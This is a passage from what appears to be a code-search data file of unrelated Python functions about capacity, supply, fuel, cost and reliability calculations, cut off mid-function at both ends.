(self.k_mpn/math.sqrt(2.0)*(self.l_1 -np.exp(-np.square(self.beta)))) # column P\n self.p_mpn = (-10.0*np.log10(np.sqrt(self.l_1 - (self.Q**2)*np.square(self.sigma_mpn)))) # column Q\n self.p_blw = (-10.0*math.log10(math.sqrt(1.0- ((self.Q*self.sigma_blw)/ self.isi_tp4_rx)**2))*self.l_1) # cell T13\n self.p_reflection = -10.0*np.log10(self.isi_reflection) # column N\n self.v_mn = (((1.0-math.pow(10.0,-0.2*self.pmn))/ (self.Q)**2)*self.l_1) # cell AG7\n print(\"isi_center : \", self.isi_center)\n\n self.p_isi_center = -10.0*np.log10(self.isi_center) # column J\n\n self.p_isi_corners = (-10.0*np.log10(self.isi_corners) - self.p_isi_center) # column K\n self.p_isi_dj_center = (-10.0*np.log10(self.isi_dj_refl_closed) - self.p_isi_center) # column L\n self.p_isi_dj_corners = (-10.0*np.log10(self.isi_dj_corners) -self.p_isi_center -self.p_isi_corners) # column M\n\n\n # calculate the \"cross\" penalty contribution, column S\n arg1 = ((self.sigma_blw**2 + self.v_rin)/ np.square(self.isi_dj_refl_closed))\n arg2 = self.l_1 - (self.Q**2)*(arg1 + self.v_mn + np.square(self.sigma_mpn))\n arg3 = (-10.0*np.log10(np.multiply(self.isi_dj_refl_closed, np.sqrt(arg2))))\n self.p_cross_center = ( # column S\n arg3\n - self.p_blw # cell T13\n - self.p_isi_center # column J\n - self.p_isi_dj_center # column L\n - self.p_mpn # column Q\n - self.p_reflection # column N\n - self.p_rin # column R\n - self.pmn*self.l_1) # cell G13\n print('p_isi_center: ', self.p_isi_center)\n\n # calculate the total power budget evaluated at the center of the eye\n self.p_total_center = ( # column T\n self.p_isi_center # column J\n + self.p_isi_dj_center # column L\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1) # cell G13\n # calculate the total power budget evaluated at the corner of the eye\n self.p_total_corners = (\n self.p_isi_center # column J\n + self.p_isi_corners # column K\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1 # cell G13\n + self.p_isi_dj_corners)# column M\n\n # receiver stressed sensitivity\n self.margin = ( self.p_budget\n - self.p_total_center) # column W\n\n self.rx_stressed_sensitivity = (\n self.tx_oma_min*self.l_1\n - self.chil\n - self.p_mpn\n - self.p_reflection\n - self.p_rin\n - 0.5*self.p_cross_center\n - self.pmn*self.l_1\n - self.margin[self.lnum//2]*self.l_1)\n\n\n # end of GbE10.penalty_calc\n #======================================================================+", "def calculate_upper_boundary(self, divisor):\n\n # see how high you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n highest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = highest_divisor + estimator\n else:\n highest_divisor = divisor\n divisor = prev_divisor + estimator\n if highest_divisor == divisor:\n break\n counter += 1\n return math.floor(highest_divisor * 1000) / 1000", "def get_additional_ball_capacity(self):\n return 999", "def calculate_supply(self):\r\n \r\n for cell in self.cells:\r\n cell.supply = min(self.max_volume,\r\n self.wave_speed / self.free_speed *\r\n (self.cell_length * self.jam_density -\r\n cell.volume)) /self.interval\r\n self.supply = self.cells[0].supply", "def get_remaining_fuel(self):\n return min(self.liquid_fuel, self.oxidizer)", "def calc_DC_supply(t_0, t_1):\n if t_0 == 0:\n t_0 = 1E6\n if t_1 > 0:\n tmin = min(t_0, t_1)\n else:\n tmin = t_0\n return tmin", "def _check_capacity_limit(self, res, amt, balance, meta, raven_vars, dispatch, t, level):\n # note \"amt\" has units of AMOUNT not RATE (resource, not resource per second)\n sign = np.sign(amt)\n # are we storing or providing?\n #print('DEBUGG supposed current level:', level)\n if sign < 0:\n # we are being asked to consume some\n cap, meta = self.get_capacity(meta, raven_vars, dispatch, t)\n available_amount = cap[res] - level\n #print('Supposed Capacity, Only calculated ins sign<0 (being asked to consumer)',cap)\n else:\n # we are being asked to produce some\n available_amount = level\n # the amount we can consume is the minimum of the requested or what's available\n delta = sign * min(available_amount, abs(amt))\n return {res: delta}, meta", "def getRepairCapacity(self):\n return int(self.myDesign.getSYCRequired() * (1-(self.strength/100.0)))", "def revenue_landfill(self) -> float:\n return self.income_statement.revenue.operating_revenue * (\n 1 - self.inputs.allocation_to_collection_unit\n )", "def calc_low_energy_bulb_ratio(lighting_outlets_total, lighting_outlets_low_energy):\n return int(100 * float(lighting_outlets_low_energy) / lighting_outlets_total + 0.5) / 100.0", "def get_additional_ball_capacity(cls):\n return 999", "def dilutionneeded(self) -> float:\n return self.stock*1.0/self.final", "def calcweight( self ):\n weight = 0\n zeroval = 0\n for sensor in ('right_top', 'right_bottom', 'left_top', 'left_bottom'):\n\t\treading = self.readings[sensor]\n\t\tcalibration = self.named_calibration[sensor]\n if sensor == 'right_top':\n zeroval = self.rtzv\n elif sensor == 'right_bottom':\n zeroval = self.rbzv\n elif sensor == 'left_top':\n zeroval = self.ltzv\n else:\n zeroval = self.lbzv\n\t\tif reading > calibration[2]:\n\t\t\tprint \"Warning, %s reading above upper calibration value\" % sensor\n\t\tif reading < calibration[1]:\n\t\t\tweight += 1700 * (reading + zeroval - calibration[0]) / (calibration[1] - calibration[0])\n\t\telse:\n\t\t\tweight += 1700 * (reading + zeroval - calibration[1]) / (calibration[2] - calibration[1]) + 1700\n\n if self.debug == 1:\n print \"weight calculated pre-conversion\", weight\n print \"return val\", self.converttolbs( weight / 100.0 )\n\n # return self.converttolbs( weight / 100.0 )\n return weight / 100.0", "def recommend_contract(meter_load, percentile=100.0):\n\n load_value = np.nanpercentile(meter_load[meter_load != 0], percentile)\n\n for contract in contracts_available:\n if load_value < contract:\n return contract/kW\n\n return contracts_available[-1]/kW", "def calculateSaleReturnSolidity(S, R, F, T):\n _supply = uint256(S)\n _reserveBalance = uint256(R)\n _reserveRatio = uint256(F)\n _sellAmount = uint256(T)\n \n if ( _supply < _sellAmount):\n raise Exception(\"Supply < Tokens\")\n\n _baseN = _supply - _sellAmount\n\n\n if _reserveRatio == 100:\n amount = uint256(_reserveBalance * _baseN ) / _supply\n if _reserveBalance < amount:\n raise Exception(\"_reservebalance < amount\")\n\n return _reserveBalance - amount\n\n resD = FIXED_ONE\n #resN = power_sale(_supply, _baseN, 100, _reserveRatio)\n resN = power(_supply, _baseN, 100, _reserveRatio)\n resN = uint256(resN)\n\n reserveUpshifted = uint256(_reserveBalance * resN)\n amount = uint256(_reserveBalance * resD) \n\n \n result = (reserveUpshifted - amount) / resN\n \n if verbose:\n print(\" rbal[%d] * resN[%d] / resD[%d] - rbal[%d] = %d \" %\n (_reserveBalance, resN, resD, _reserveBalance, result))\n\n return uint256(result - minUnit(R))", "def calculate_init_stock(self, good=None):\n # random quantity * systemsize * techlevel (hence, it can be zero)\n size = self.planet.system_size\n level = self.planet.tech_level\n stock = random.randrange(0, 25) * (size + 1) * level\n\n # SPECIALRESOURCES add 50% production\n if self.planet.special in [self.tradeitem.cr]:\n stock = stock + (stock * 0.5)\n\n # TODO enhancement: difficulty levels should affect fuel stocks\n if good in ['fuel']:\n stock = stock * 10\n\n return int(stock)", "def volneeded(self, totalvol: float) -> float:\n return totalvol*self.final*1.0/self.stock", "def _load_factor(self):\n return self.size / len(self.buckets)", "def initial_cash_balance(self) -> float:\n return self.buy_budget * len(self.stocks)", "def ram_condition(min_gb=3):\n return get_free_gb() < min_gb", "def MINIMUM_BET() -> int:\n return 10", "def _compute_quantization_factor(self):\n self._quantization_factor = (float(self._full_value_range) /\n self._number_of_intervals)\n logging.debug(\n 'full value range: %r, number of intervals: %r',\n self._full_value_range, self._number_of_intervals)\n logging.debug('quantization factor: %r', self._quantization_factor)", "def calculate_demand(self):\r\n \r\n for cell in self.cells:\r\n cell.demand = min(cell.volume, self.max_volume) /self.interval\r\n self.demand = self.cells[-1].demand", "def determine_unit_limits(DISPATCHLOAD, BIDPEROFFER_D):\n\n # Override ramp rates for fast start units.\n ic = DISPATCHLOAD # DISPATCHLOAD provides the initial operating conditions (ic).\n ic['RAMPMAX'] = ic['INITIALMW'] + ic['RAMPUPRATE'] * (5 / 60)\n ic['RAMPUPRATE'] = np.where((ic['TOTALCLEARED'] > ic['RAMPMAX']) & (ic['DISPATCHMODE'] != 0.0),\n (ic['TOTALCLEARED'] - ic['INITIALMW']) * (60 / 5), ic['RAMPUPRATE'])\n ic['RAMPMIN'] = ic['INITIALMW'] - ic['RAMPDOWNRATE'] * (5 / 60)\n ic['RAMPDOWNRATE'] = np.where((ic['TOTALCLEARED'] < ic['RAMPMIN']) & (ic['DISPATCHMODE'] != 0.0),\n (ic['INITIALMW'] - ic['TOTALCLEARED']) * (60 / 5), ic['RAMPDOWNRATE'])\n\n # Override AVAILABILITY when SEMIDISPATCHCAP is 1.0\n ic = pd.merge(ic, BIDPEROFFER_D.loc[:, ['DUID', 'MAXAVAIL']], 'inner', on='DUID')\n ic['AVAILABILITY'] = np.where((ic['MAXAVAIL'] < ic['AVAILABILITY']) & (ic['SEMIDISPATCHCAP'] == 1.0) &\n (ic['TOTALCLEARED'] <= ic['MAXAVAIL']), ic['MAXAVAIL'],\n ic['AVAILABILITY'])\n\n # Where the availability is lower than the ramp down min set the AVAILABILITY to equal the ramp down min.\n ic['AVAILABILITY'] = np.where(ic['AVAILABILITY'] < ic['RAMPMIN'], ic['RAMPMIN'], ic['AVAILABILITY'])\n\n # Format for compatibility with the Spot market class.\n ic = ic.loc[:, ['DUID', 'INITIALMW', 'AVAILABILITY', 'RAMPDOWNRATE', 'RAMPUPRATE']]\n ic.columns = ['unit', 'initial_output', 'capacity', 'ramp_down_rate', 'ramp_up_rate']\n return ic", "def penalty(self):\n return 0", "def get_occupant_room_load_for_cooling_balanced(\n l_cs: np.ndarray, l_cl: np.ndarray, q_d_trs_prt: np.ndarray) -> (np.ndarray, np.ndarray):\n\n l_d_cs = np.where(l_cs[0:5] > 0.0, l_cs[0:5] - q_d_trs_prt, 0.0)\n l_d_cl = l_cl[0:5]\n\n return np.clip(l_d_cs, 0.0, None), np.clip(l_d_cl, 0.0, None)", "def get_fuel_total_saved (self):\n #~ print self.lost_heat_recovery\n #~ print self.intertie_offset_generation_fuel_used\n #~ print self.pre_intertie_generation_fuel_used\n #~ gen_eff = self.cd[\"diesel generation efficiency\"]\n #~ fuel_used = self.intertie_offset_generation / gen_eff\n\n generation_diesel_reduction = \\\n np.array(self.pre_intertie_generation_fuel_used\\\n [:self.actual_project_life])\n return - np.array(self.lost_heat_recovery[:self.actual_project_life]) +\\\n generation_diesel_reduction", "def sum_availability(val, quant) -> float:\n return val + qty_available(quant)", "def calculate_reserves(self):\n # TODO: Add back cash dividends and deduct exchange costs\n console.print(\"Still has to be build.\")", "def verify_load_feasibility(self):\n max_load = 0\n for pp in self.powerplants:\n max_load += pp[\"pmax\"]\n\n min_load = max_load\n for pp in self.powerplants:\n min_load = min(pp[\"pmin\"], min_load)\n\n if self.load > max_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too high for our powerstations \"\n return False\n\n if self.load < min_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too low for our powerstations \"\n return False\n\n return True", "def get_allowable_fraction_without(mem_to_reserve, cuda_device_index):\n current_free = get_free_gpu_memory(cuda_device_index)\n allowable = current_free - mem_to_reserve # 1GB\n allowable_fraction = allowable / current_free\n if allowable_fraction <= 0.0:\n raise ValueError(f\"Can't leave 1GB over for the inference kernel, because\"\n f\" there is only {allowable} total free GPU memory.\")\n return allowable_fraction", "def canopy_heat_capacity(states: ClimateStates) -> float:\n return CAP_LEAF * states.leaf_area_index", "def get_risk_per_unit(price, sl_price):\n return abs(price - sl_price)", "def trucks_required(self) -> int:\n daily_demand = (\n self.total_demand() / self.operations.productivity.working_days_per_year\n )\n trucks_required = np.ceil(\n daily_demand\n / (self.operations.avg_vol_per_lift() * self.inputs.lifts_per_truck_day)\n )\n return trucks_required", "def fibre_strain_energy(self, l_stretch):\n if l_stretch <= 1.0:\n # compressed region - no energy\n return 0.0\n\n # Note: this range should be '< lm' according to FEBio but we use '<=' to\n # make setting c6 easier -> there's no difference because it's cts.\n if l_stretch <= self.lm:\n # exponential energy\n return self.c3 * (exp(self.c4 * (l_stretch - 1.0)) - 1.0)\n\n # linear energy\n return self.c5 * l_stretch + self.c6", "def calculate_demand(flow, requested_sf, available_sf, service_functions):\n\n if requested_sf in available_sf:\n vnf_need_placement = False\n demanded_total_capacity = 0.0\n for sf_i, sf_data in available_sf.items():\n if requested_sf == sf_i:\n # Include flows data rate in requested sf capacity calculation\n demanded_total_capacity += service_functions[sf_i]['resource_function'](\n sf_data['load'] + flow.dr)\n else:\n demanded_total_capacity += service_functions[sf_i]['resource_function'](sf_data['load'])\n return demanded_total_capacity, vnf_need_placement\n else:\n vnf_need_placement = True\n available_sf[requested_sf] = {'load': 0.0}\n demanded_total_capacity = 0.0\n for sf_i, sf_data in available_sf.items():\n if requested_sf == sf_i:\n # Include flows data rate in requested sf capacity calculation\n demanded_total_capacity += service_functions[sf_i]['resource_function'](\n sf_data['load'] + flow.dr)\n else:\n demanded_total_capacity += service_functions[sf_i]['resource_function'](sf_data['load'])\n del available_sf[requested_sf]\n return demanded_total_capacity, vnf_need_placement", "def calc_generation_wind_proposed (self):\n if self.comp_specs['proposed capacity'] != UNKNOWN:\n self.load_offset_proposed = \\\n self.comp_specs['proposed capacity']\n self.generation_wind_proposed = \\\n self.comp_specs['proposed generation']\n\n if self.generation_wind_proposed == UNKNOWN:\n self.generation_wind_proposed = self.load_offset_proposed *\\\n float(self.comp_specs\\\n ['capacity factor'])*\\\n constants.hours_per_year\n\n return\n\n self.load_offset_proposed = 0\n\n offset = self.average_load*\\\n (self.comp_specs['percent generation to offset'] / 100.0)\n #~ print self.forecast.generation['generation hydro'].sum()\n\n # removed on purpose\n #~ hydro = \\\n #~ self.forecast.generation['generation hydro'].fillna(0).sum()\n #~ if hydro > 0:\n #~ offset *= 2\n\n # existing very variable RE\n existing_RE = \\\n int(float(self.cd['wind capacity'])) + \\\n int(float(self.cd['solar capacity']))\n\n if existing_RE < (round(offset/25) * 25): # ???\n #~ print \"True\"\n self.load_offset_proposed = round(offset/25) * 25 - existing_RE\n\n\n\n # not needed for now\n #~ self.total_wind_generation = self.generation_load_proposed + \\\n #~ int(self.comp_specs['wind capacity'])\n\n self.generation_wind_proposed = self.load_offset_proposed * \\\n float(self.comp_specs['capacity factor'])*\\\n constants.hours_per_year\n #~ print 'self.load_offset_proposed',self.load_offset_proposed\n #~ print 'self.generation_wind_proposed',self.generation_wind_proposed", "def calc_pre_intertie_generation (self):\n\n self.pre_intertie_generation = \\\n self.forecast.get_generation(self.start_year,self.end_year)\n\n gen_eff = self.cd[\"diesel generation efficiency\"]\n self.pre_intertie_generation_fuel_used = \\\n self.pre_intertie_generation / gen_eff\n\n #~ print 'self.baseline_generatio',self.baseline_generation", "def calculate_available_node_res (self, vnfs_to_be_left_in_place={},\n mode=MODE_ADD):\n # add available res attribute to all Infras and subtract the running\n # NFs` resources from the given max res\n for n in self.infras:\n setattr(self.network.node[n.id], 'availres',\n copy.deepcopy(self.network.node[n.id].resources))\n if mode == self.MODE_ADD:\n for vnf in self.running_nfs(n.id):\n # if a VNF needs to be left in place, then it is still mapped by the \n # mapping process, but with placement criteria, so its resource \n # requirements will be subtracted during the greedy process.\n if vnf.id not in vnfs_to_be_left_in_place:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n self.network.node[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\n \"Infra node`s resources are expected to represent its maximal \"\n \"capabilities.\"\n \"The NodeNF(s) running on Infra node %s, use(s)more resource \"\n \"than the maximal.\" % n.id)\n else:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n vnfs_to_be_left_in_place[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\"VNF %s cannot be kept on host %s with \"\n \"increased resource requirements due to not \"\n \"enough available resources!\" % (vnf.id, n.id))\n\n self.network.node[n.id].availres = newres", "def _cost_caught_by_police(self):\n if self.fine_frequency != 0:\n if self.number_of_courses % self.fine_frequency == 0 and self.number_of_courses != 0:\n if self.number_of_courses % self.fine_frequency_paid_by_driver == 0 and self.number_of_courses != 0:\n self.fine_paid_number_of_courses += 1\n fine_value = np.random.choice([100, 200, 500], p=[0.25, 0.4, 0.35])\n self.total_penalty_points += self._add_penalty_points() # adding penalty points\n return fine_value\n else:\n return 0\n else:\n return 0\n else:\n return 0", "def _cost_refueling(self):\n if self.number_of_courses % self.refueling_frequency == 0 & self.number_of_courses != 0:\n lowest_amount = self.refueling_liter_range[0] # take a minimum value\n highest_amount = self.refueling_liter_range[1] # take a maximum value\n refueled_petrol = randint(lowest_amount, highest_amount)\n cost = refueled_petrol * self.petrol_cost\n return cost\n else:\n return 0", "def required_points(self):\n req_points = self.min_performance * self.initial_available_points()\n return np.maximum(0, np.int64(np.ceil(req_points)))", "def checkFuel(self):\n return self.maze.checkFuelCost(self.checkpoint,currentLap = self.laps) - self.timeDriving", "def quick_ratio(self):\n return (\n self.current_assets - self.inventory_net) / self.current_liabilities", "def support(stock):\n output= stock_min(stock)+(stock_min(stock)*.05)\n return output", "def calculate_br_up_metric(br_up):\n if br_up < 1:\n br_up = 1\n min_baud = 1200\n max_baud = 38400\n\n num = np.log(br_up) - np.log(min_baud)\n den = np.log(max_baud) - np.log(min_baud)\n\n return (num / den + 0.1).clip(min=0, max=1)", "def budget_used(self):\n return int(self.total_spent() / self.budget() * 100.0)", "def calc_annual_electric_savings (self):\n costs = self.comp_specs['diesel generator o&m']\n\n for kW in costs.keys():\n try:\n if self.average_load < int(kW):\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n break\n except ValueError:\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n\n self.baseline_generation_cost = maintenance + \\\n (self.pre_intertie_generation_fuel_used * self.diesel_prices)\n\n maintenance = self.capital_costs * \\\n (self.comp_specs['percent o&m'] / 100.0)\n self.proposed_generation_cost = maintenance + \\\n self.intertie_offset_generation_fuel_used * \\\n self.intertie_diesel_prices\n self.annual_electric_savings = self.baseline_generation_cost -\\\n self.proposed_generation_cost\n #~ print len(self.annual_electric_savings)\n #~ print 'self.annual_electric_savings',self.annual_electric_savings", "def initialize_supply(self):\n unit_count = 0\n for i in range(self.start_allocation[0 ] -1, self.start_allocation[1]):\n for j in range(len(self.capacity_list[i][1])):\n self.capacity_list[i][1][j] = 1\n unit_count += 1\n self.total_supply -= unit_count", "def test_loc_techs_resource_capacity_constraint(self, override):\n\n if override is None:\n m = build_model(\n {}, \"simple_supply_and_supply_plus,two_hours,investment_costs\"\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n assert expr.lb == 0\n assert expr.ub == np.inf\n\n else:\n m = build_model(\n {\n \"techs.test_supply_plus.constraints.resource_cap_{}\".format(\n override\n ): 10\n },\n \"simple_supply_and_supply_plus,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n if override == \"max\":\n assert expr.ub == 10\n assert expr.lb == 0\n elif override == \"equals\":\n assert expr.ub == 10\n assert expr.lb == 10\n if override == \"min\":\n assert expr.lb == 10\n assert expr.ub == np.inf", "def _estimate_elasticsearch_requirement(\n instance: Instance,\n desires: CapacityDesires,\n working_set: float,\n reads_per_second: float,\n max_rps_to_disk: int,\n zones_per_region: int = 3,\n copies_per_region: int = 3,\n) -> CapacityRequirement:\n # Keep half of the cores free for background work (merging mostly)\n needed_cores = math.ceil(sqrt_staffed_cores(desires) * 1.5)\n # Keep half of the bandwidth available for backup\n needed_network_mbps = simple_network_mbps(desires) * 2\n\n needed_disk = math.ceil(\n (1.0 / desires.data_shape.estimated_compression_ratio.mid)\n * desires.data_shape.estimated_state_size_gib.mid\n * copies_per_region,\n )\n\n # Rough estimate of how many instances we would need just for the the CPU\n # Note that this is a lower bound, we might end up with more.\n needed_cores = math.ceil(\n max(1, needed_cores // (instance.cpu_ghz / desires.core_reference_ghz))\n )\n rough_count = math.ceil(needed_cores / instance.cpu)\n\n # Generally speaking we want fewer than some number of reads per second\n # hitting disk per instance. If we don't have many reads we don't need to\n # hold much data in memory.\n instance_rps = max(1, reads_per_second // rough_count)\n disk_rps = instance_rps * _es_io_per_read(max(1, needed_disk // rough_count))\n rps_working_set = min(1.0, disk_rps / max_rps_to_disk)\n\n # If disk RPS will be smaller than our target because there are no\n # reads, we don't need to hold as much data in memory\n needed_memory = min(working_set, rps_working_set) * needed_disk\n\n # Now convert to per zone\n needed_cores = needed_cores // zones_per_region\n needed_disk = needed_disk // zones_per_region\n needed_memory = int(needed_memory // zones_per_region)\n logger.debug(\n \"Need (cpu, mem, disk, working) = (%s, %s, %s, %f)\",\n needed_cores,\n needed_memory,\n needed_disk,\n working_set,\n )\n\n return CapacityRequirement(\n requirement_type=\"elasticsearch-data-zonal\",\n core_reference_ghz=desires.core_reference_ghz,\n cpu_cores=certain_int(needed_cores),\n mem_gib=certain_float(needed_memory),\n disk_gib=certain_float(needed_disk),\n network_mbps=certain_float(needed_network_mbps),\n context={\n \"working_set\": min(working_set, rps_working_set),\n \"rps_working_set\": rps_working_set,\n \"disk_slo_working_set\": working_set,\n \"replication_factor\": copies_per_region,\n \"compression_ratio\": round(\n 1.0 / desires.data_shape.estimated_compression_ratio.mid, 2\n ),\n \"read_per_second\": reads_per_second,\n },\n )", "def fuel_required(mass):\n return max(math.floor(mass/3) - 2, 0)", "def calculate_217f_part_stress(**attributes): # pylint: disable=R0912, R0914\n _dic_ref_temp = {\n 1: 343.0,\n 2: {\n 1: 343.0,\n 2: 343.0,\n 3: 398.0,\n 4: 398.0\n },\n 3: 298.0,\n 5: 398.0,\n 6: 298.0,\n 7: 298.0,\n 9: 358.0,\n 10: 358.0,\n 11: 313.0,\n 12: 298.0,\n 13: 358.0,\n 14: 343.0,\n 15: 343.0\n }\n _dic_factors = {\n 1: [4.5E-9, 12.0, 1.0, 0.6, 1.0, 1.0],\n 2: {\n 1: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 2: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 3: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0],\n 4: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0]\n },\n 3: [7.33E-3, 0.202, 2.6, 1.45, 0.89, 1.3],\n 5: [0.0031, 1.0, 10.0, 1.0, 1.0, 1.5],\n 6: [0.00148, 1.0, 2.0, 0.5, 1.0, 1.0],\n 7: [0.00015, 2.64, 1.0, 0.466, 1.0, 1.0],\n 8: [0.021, 0.065, 0.105, 0.0, 0.0, 0.0],\n 9: [0.0062, 1.0, 5.0, 1.0, 1.0, 1.0],\n 10: [0.0735, 1.03, 4.45, 2.74, 3.51, 1.0],\n 11: [0.0398, 0.514, 5.28, 1.44, 4.46, 1.0],\n 12: [0.0481, 0.334, 4.66, 1.47, 2.83, 1.0],\n 13: [0.019, 0.445, 7.3, 2.69, 2.46, 1.0],\n 14: [0.0246, 0.459, 9.3, 2.32, 5.3, 1.0],\n 15: [0.018, 1.0, 7.4, 2.55, 3.6, 1.0]\n }\n _dic_piQ = {\n 1: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 2: [0.03, 0.1, 0.3, 1.0, 5.0, 5.0, 15.0],\n 3: [1.0, 3.0],\n 4: [1.0, 3.0],\n 5: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 6: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 7: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 8: [1.0, 15.0],\n 9: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 10: [2.5, 5.0],\n 11: [2.0, 4.0],\n 12: [2.0, 4.0],\n 13: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 14: [2.5, 5.0],\n 15: [2.0, 4.0]\n }\n _dic_piE = {\n 1: [\n 1.0, 3.0, 8.0, 5.0, 13.0, 4.0, 5.0, 7.0, 11.0, 19.0, 0.5, 11.0,\n 27.0, 490.0\n ],\n 2: [\n 1.0, 2.0, 8.0, 4.0, 14.0, 4.0, 8.0, 10.0, 18.0, 19.0, 0.2, 10.0,\n 28.0, 510.0\n ],\n 3: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 4: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 5: [\n 1.0, 2.0, 11.0, 5.0, 18.0, 15.0, 18.0, 28.0, 35.0, 27.0, 0.8, 14.0,\n 38.0, 610.0\n ],\n 6: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.3, 13.0,\n 34.0, 610.0\n ],\n 7: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.5, 13.0,\n 34.0, 610.0\n ],\n 8: [\n 1.0, 5.0, 21.0, 11.0, 24.0, 11.0, 30.0, 16.0, 42.0, 37.0, 0.5,\n 20.0, 53.0, 950.0\n ],\n 9: [\n 1.0, 2.0, 12.0, 6.0, 20.0, 5.0, 8.0, 9.0, 15.0, 33.0, 0.5, 18.0,\n 48.0, 870.0\n ],\n 10: [\n 1.0, 2.0, 18.0, 8.0, 30.0, 8.0, 12.0, 13.0, 18.0, 53.0, 0.5, 29.0,\n 76.0, 1400.0\n ],\n 11: [\n 1.0, 2.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 12: [\n 1.0, 3.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 13: [\n 1.0, 3.0, 14.0, 6.0, 24.0, 5.0, 7.0, 12.0, 18.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ],\n 14: [\n 1.0, 2.0, 19.0, 8.0, 29.0, 40.0, 65.0, 48.0, 78.0, 46.0, 0.5, 25.0,\n 66.0, 1200.0\n ],\n 15: [\n 1.0, 3.0, 14.0, 7.0, 24.0, 6.0, 12.0, 20.0, 30.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ]\n }\n # Resistance factor (piR) dictionary of values. The key is the\n # subcategory ID. The index in the returned list is the resistance range\n # breakpoint (breakpoint values are in _lst_breakpoints below). For\n # subcategory ID 6 and 7, the specification ID selects the correct set of\n # lists, then the style ID selects the proper list of piR values and then\n # the resistance range breakpoint is used to select\n _dic_piR = {\n 1: [1.0, 1.1, 1.6, 2.5],\n 2: [1.0, 1.1, 1.6, 2.5],\n 3: [1.0, 1.2, 1.3, 3.5],\n 5: [1.0, 1.7, 3.0, 5.0],\n 6: [[[1.0, 1.0, 1.2, 1.2, 1.6, 1.6, 1.6,\n 0.0], [1.0, 1.0, 1.0, 1.2, 1.6, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.0, 1.2, 1.2, 1.2,\n 1.6], [1.0, 1.2, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0],\n [1.0, 1.6, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.1, 1.2, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0, 0.0, 0.0]],\n [[1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.2, 1.6, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.0, 2.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [1.0, 1.2, 1.4, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.6, 0.0, 0.0, 0.0], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.6, 0.0, 0.0\n ], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.2, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 0.0, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0],\n [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.5, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 1.6, 0.0],\n [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [\n 1.0, 1.0, 1.4, 2.4, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.6, 0.0,\n 0.0], 